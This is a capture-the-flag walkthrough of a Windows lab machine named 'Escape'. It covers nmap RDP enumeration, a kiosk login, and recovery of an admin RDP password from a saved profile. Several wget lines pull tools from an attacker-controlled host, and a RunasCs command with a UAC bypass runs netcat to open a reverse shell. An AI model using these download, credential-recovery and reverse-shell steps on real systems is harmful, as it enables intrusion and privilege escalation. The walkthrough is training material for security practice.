VulnEscape
#easy #windows
Last updated
#easy #windows
Last updated
PORT STATE SERVICE REASON
3389/tcp open ms-wbt-server syn-ack ttl 127echo -n $(cat allPorts.gnmap | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ','; echo) | xclip -sel clipnmap -p 3389 -sCV -Pn -n -vv <TARGET-IP> -oA openPortsServicesVersionPORT STATE SERVICE REASON VERSION
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=Escape
| Issuer: commonName=Escape
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-24T12:19:22
| Not valid after: 2026-03-26T12:19:22
| MD5: 3dde:c441:ea35:6a12:4c3d:d69a:eaff:c3c4
| SHA-1: f9fb:dc07:f0a5:4206:d475:d488:3fee:c463:cb53:f3c7
| -----BEGIN CERTIFICATE-----
| MIIC0DCCAbigAwIBAgIQdIymnh/AzZRLbMY9RHSl+jANBgkqhkiG9w0BAQsFADAR
| MQ8wDQYDVQQDEwZFc2NhcGUwHhcNMjUwOTI0MTIxOTIyWhcNMjYwMzI2MTIxOTIy
| WjARMQ8wDQYDVQQDEwZFc2NhcGUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
| AoIBAQDmbPW5qyhmia8Cud4sV3d8MVMkBZkEuPkaC5DmTnYtqfTUcg6Z6HPeeDuN
| bDz8FwZtL3uF+deriimEDwJNZzPNoa4Sbs7ZaNZKsrShJo1pdT1YeFgtzovqXww0
| vzW44s9T3NfAFS5TtWpU3Fqh4G8CoulMJ1xLI+ZV/xyRfMtyT1cWZL/TR3UycNj2
| PGQ4dw3RBDaZP65wkc1rEnx4sctcnPOs9nI8ShNUJtx0r8VYITAgayl6KNS1CUwR
| qhPu10Ap4QdM+KlN/uurjuP3+h8D6JhFzEarI/2wNfUWJU5FpSWT79SwG2DbxPFl
| d3L0dNtwlmIN29Pe1/Yab0z0U45BAgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUF
| BwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEAsvL4HPZoi6YdvQy0
| /49u+6zCkFcEw6yhbOTJfT+UQ8YhS+16+84NIHb251DzzujYQVo1G2OE2d4g34Xf
| 5V6rix91gv4XVmsPeTMDloe9y8rWjegYQizoE15Y2dVrTXrX2cS/gGeR8Z14HmXu
| jp0WfW5rUh1o76tqMppDc7Jfyz+aElQ3H9kXi6qqkMyR3o1ojdjBS8RXSsoy8d9L
| kcPC2k8VgW9cbat9fhrGuoCBhxJwn2jTr2i3/5qbdsKwLYqNo2wsWohEIFDop8ET
| fExSBW56DXj0Mn16OEYQ1I97Abb/aZcwbfjRYGCeYMsJiZGwYW9GcU6ABv5bsH0I
| YZZYhg==
|_-----END CERTIFICATE-----
|_ssl-date: 2025-09-25T12:31:04+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: ESCAPE
| NetBIOS_Domain_Name: ESCAPE
| NetBIOS_Computer_Name: ESCAPE
| DNS_Domain_Name: Escape
| DNS_Computer_Name: Escape
| Product_Version: 10.0.19041
|_ System_Time: 2025-09-25T12:31:00+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1snmap -p 3389 --script rdp-enum-encryption,rdp-ntlm-info,rdp-vuln-ms12-020 -Pn -n <TARGET-IP> -oN rdp_enum.txtPORT STATE SERVICE
3389/tcp open ms-wbt-server
| rdp-ntlm-info:
| Target_Name: ESCAPE
| NetBIOS_Domain_Name: ESCAPE
| NetBIOS_Computer_Name: ESCAPE
| DNS_Domain_Name: Escape
| DNS_Computer_Name: Escape
| Product_Version: 10.0.19041
|_ System_Time: 2025-09-25T12:35:34+00:00
| rdp-enum-encryption:
| Security layer
| CredSSP (NLA): SUCCESS
| CredSSP with Early User Auth: SUCCESS
| RDSTLS: SUCCESS
| SSL: SUCCESS
|_ RDP Protocol Version: Unknownxfreerdp3 /v:<TARGET-IP> /d:Escape /p:'' /w:1366 /h:768 /sec:nla:offUsuario: KioskUser0PS C:\Users\kioskUser0\Downloads> cd ..\Desktop\
PS C:\Users\kioskUser0\Desktop> type user.txtPS C:\Users\kioskUser0\Desktop> cd C:\
PS C:\> dir -Force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 2/4/2024 12:52 AM $Recycle.Bin
d--h-- 6/24/2025 8:23 AM $WinREAgent
d--hsl 2/3/2024 11:32 AM Documents and Settings
d----- 2/3/2024 3:11 AM inetpub
d----- 12/7/2019 1:14 AM PerfLogs
d-r--- 4/10/2025 11:29 PM Program Files
d-r--- 2/3/2024 3:03 AM Program Files (x86)
d--h-- 6/24/2025 8:06 AM ProgramData
d--hs- 10/1/2024 11:40 PM Recovery
d--hs- 6/16/2025 4:42 AM System Volume Information
d-r--- 2/3/2024 3:43 AM Users
d----- 6/24/2025 1:24 PM Windows
d--h-- 2/3/2024 3:05 AM _admin
-a-hs- 2/4/2024 1:35 AM 8192 DumpStack.log
-a-hs- 9/25/2025 8:08 AM 8192 DumpStack.log.tmp
-a-hs- 10/1/2024 11:48 PM 2093002752 hiberfil.sys
-a-hs- 9/25/2025 8:08 AM 1476395008 pagefile.sys
-a-hs- 9/25/2025 8:08 AM 16777216 swapfile.sysPS C:\> cd _admin
PS C:\_admin> dir
Directory: C:\_admin
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/3/2024 3:04 AM installers
d----- 2/3/2024 3:05 AM passwords
d----- 2/3/2024 3:05 AM temp
-a---- 2/3/2024 3:03 AM 0 Default.rdp
-a---- 2/3/2024 3:04 AM 574 profiles.xml
PS C:\_admin> type profiles.xml
<?xml version="1.0" encoding="utf-16"?>
<!-- Remote Desktop Plus -->
<Data>
<Profile>
<ProfileName>admin</ProfileName>
<UserName>127.0.0.1</UserName>
<Password>JWqkl6IDfQxXXmiHIKIP8ca0G9XxnWQZgvtPgON2vWc=</Password>
<Secure>False</Secure>
</Profile>
</Data>
PS C:\_admin> cd 'C:\Program Files (x86)\Remote Desktop Plus\'
PS C:\Program Files (x86)\Remote Desktop Plus> .\rdp.exe
PS C:\Program Files (x86)\Remote Desktop Plus> copy -r C:\_admin C:\Users\kioskUser0\Downloads\python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...PS C:\Users\kioskUser0\Downloads> wget http://<ATTACKER-IP>:<PORT>/BulletsPassView.exe -outfile BulletsPassView.exe
PS C:\Users\kioskUser0\Downloads> .\BulletsPassView.exeContraseña: Twisting3021python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...PS C:\Users\kioskUser0\Downloads> wget http://<ATTACKER-IP>:<PORT>/RunasCs.exe -outfile RunasCs.exePS C:\Users\kioskUser0\Downloads> wget http://<ATTACKER-IP>:<PORT>/nc64.exe -outfile nc64.exenc -lnvp 1111
listening on [any] 1111 ...PS C:\Users\kioskUser0\Downloads> .\RunasCs.exe admin Twisting3021 "C:\Users\kioskUser0\Downloads\nc64.exe <ATTACKER-IP> <PORT> -e cmd.exe" --bypass-uacconnect to [10.10.14.137] from (UNKNOWN) [10.129.234.51] 53205
Microsoft Windows [Version 10.0.19045.5965]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 4A4B-52B4
Directory of C:\Users\Administrator\Desktop
02/03/2024 04:44 AM <DIR> .
02/03/2024 04:44 AM <DIR> ..
02/03/2024 10:07 AM 2,332 Microsoft Edge.lnk
09/25/2025 08:10 AM 34 root.txt
2 File(s) 2,366 bytes
2 Dir(s) 5,578,952,704 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt